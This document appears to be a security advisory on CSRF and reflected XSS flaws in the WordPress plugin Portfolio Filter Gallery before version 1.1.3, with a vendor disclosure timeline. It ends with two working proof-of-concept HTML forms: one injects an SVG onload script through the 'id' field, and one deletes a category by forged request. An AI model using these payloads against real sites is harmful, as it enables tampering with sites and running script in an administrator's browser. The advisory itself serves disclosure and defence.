Portfolio Filter Gallery < 1.1.3 – CSRF & Reflected XSS

Description

Lack of CSRF checks on the Filters page could allow attackers to add/edit/update/delete categories and delete all categories, as well as perform reflected XSS attacks.

v1.0.8 fixed the reflected XSS, however no CSRF check on delete and delete_all_category actions
v1.1.0 released, no additional fix
v1.1.1 released, no additional fix

January 3rd, 2020 - Vendor contacted about lack of CSRF checks
January 4th, 2020 - Vendor Acknowledgment
January 7th, 2020 - v1.1.2 Released, no fix
January 14th, 2020 - Vendor contacted for updates. Responded that the plugin will be updated after "2 days holidays" (whatever that means)
January 22nd, 2020 - Still no updates, escalated to WP plugin team.
January 27th, 2020. v1.1.3 released, fixing the remaining CSRF issues. Capability checks are missing from AJAX calls though, but I give up on this one.

Proof of Concept

Reflected XSS:

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://[WP]/wp-admin/edit.php?post_type=awl_filter_gallery&page=pfg-filter-page" method="POST">
      <input type="hidden" name="action" value="edit" />
      <input type="hidden" name="id" value='"><svg/onload=alert(/XSS/)>' />
    </form>
  </body>
</html>

CSRF to delete a category:
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://[WP]/wp-admin/edit.php?post_type=awl_filter_gallery&page=pfg-filter-page" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
    </form>
  </body>
</html>